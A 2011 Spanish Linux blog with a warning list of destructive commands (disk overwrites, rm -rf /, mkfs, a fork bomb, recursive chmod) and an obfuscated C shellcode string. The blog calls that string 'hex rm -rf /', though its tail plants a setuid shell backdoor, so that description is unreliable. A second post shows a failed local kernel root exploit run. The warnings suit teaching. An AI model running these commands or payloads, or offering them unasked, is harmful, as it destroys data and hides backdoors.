Si tan facil fuera de tener Gentoo, hasta las chicas del anime podrian hacerlo?, LOL!!!
miércoles, 22 de junio de 2011
sábado, 18 de junio de 2011
Recopilaciòn de comandos peligrosos
Hola, aca les traigo una lista de comandos peligrosos para GNU/Linux para evitar que les pase algo y pierdan a su precisosa distro :)
Mirar pero no ejecutar nunca como root !!:
cat /dev/urandom > /dev/sda
Mala idea, ese comando lo que hace es pasar todos los datos de urandom, al bloque del disco duro, causando que pierdas los datos y las particiones.
rm -rf /
El conocido comando mortal, este borra absolutamente todo lo que este, incluso los datos de otras particiones si es que estan montadas.
chmod -R 777 /
Chmod es una muy buena herramienta para asignar permisos, pero nunca ejecutar asi, eso dañaria la instalacion de su distro y al reiniciar seria irrancable, lo bueno es que los datos del directorio home al estar con el permiso universal 777 se pueden recuperar, pero nada mas :S desde un live cd.
dd if=/dev/random of=/dev/port
Menos mortal, pero si te puede dar molestias. Al pasar los datos de /dev/random a /dev/port causaras un kernel panic, con reinicio regresa a la normalidad.
mv /home/yourhomedirectory/* /dev/null
Esto te pasara los datos de tu home a un punto nulo /dev/null (el agujero negro de Unix), y no los podras recuperar mas
chmod 000 -R /
Otra variante del chmod usado mal, ahora el permiso 000 te denegara el acceso a todo :S, no ejecutar nunca.
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Version Hexadecimal del rm -rf /, puede pasar desapercibida hasta en los usuarios mas expertos, ni se les ocurra ejecutarla.
mkfs.ext3 /dev/sda
Esto elimina los datos del dispositivo seleccionado, no hacerlo o perderan sus datos.
cat /dev/input/mouse0 > /dev/sda
Otro comando peligroso, la peor manera de sacar la salida del raton, esa va directo al /dev/sda y con ello la perdida de datos, particiones, muy peligrosa.
:(){ :|:& };:
Una conocida Bomba Fork, lo que hace es crear muchos procesos hasta colapsar al sistema, y con ello obliga al reinicio del sistema, y en el peor de los casos, perdida de datos.
chmod -x chmod
Esta tambien causa que el sistema quede en mal estado.
Recuerden nunca ejecutar esos comandos como root u de otra manera o sino les causara problemas, dolores de cabeza y lo peor perdida de datos.
jueves, 16 de junio de 2011
Exploit kernel linux
Un ya reconocido exploit uno de tipo local exploit permite obtener a root, desde el kernel 2.6.30, en muchos que no han sido parcheados o sea vanilla aun funciona en esos...
En mi caso no funciono, lo probe en el nuevo kernel 3.0 en Gentoo, para ser exactos el 3.0_rc3.
Requerimientos:
Tener el paquete build-essential en debian o derivados ya instalado (en Gentoo ya viene con todo lo necesario ya):
#apt-get install build-essential
luego:
$gcc exploit.c -o exploit
probar:
[dexter4@Kagamine:~/Descargas_Opera/cheddar_bay]% ./exploit
[+] MAPPED ZERO PAGE!
[+] Resolved nf_unregister_hooks to 0xc13e0df6
[+] Resolved commit_creds to 0xc1033767
[+] *0x2c |= 1
[+] b00m!
[+] Disabled security of : nothing, what an insecure machine!
[+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable?
[dexter4@Kagamine:~/Descargas_Opera/cheddar_bay]% uname -a
Linux Kagamine 3.0.0-rc3 #1 PREEMPT Wed Jun 15 16:47:18 CLT 2011 i686 Intel(R) Pentium(R) 4 CPU 1.60GHz GenuineIntel GNU/Linux
al final no pudo obtener root, en mi caso pero casi fue, recuerden no hacer trampa y cerrar toda sesion de root anteriormente :)
Recuerden no abusar de los exploit, es solo para fines de aprendizaje, o similar...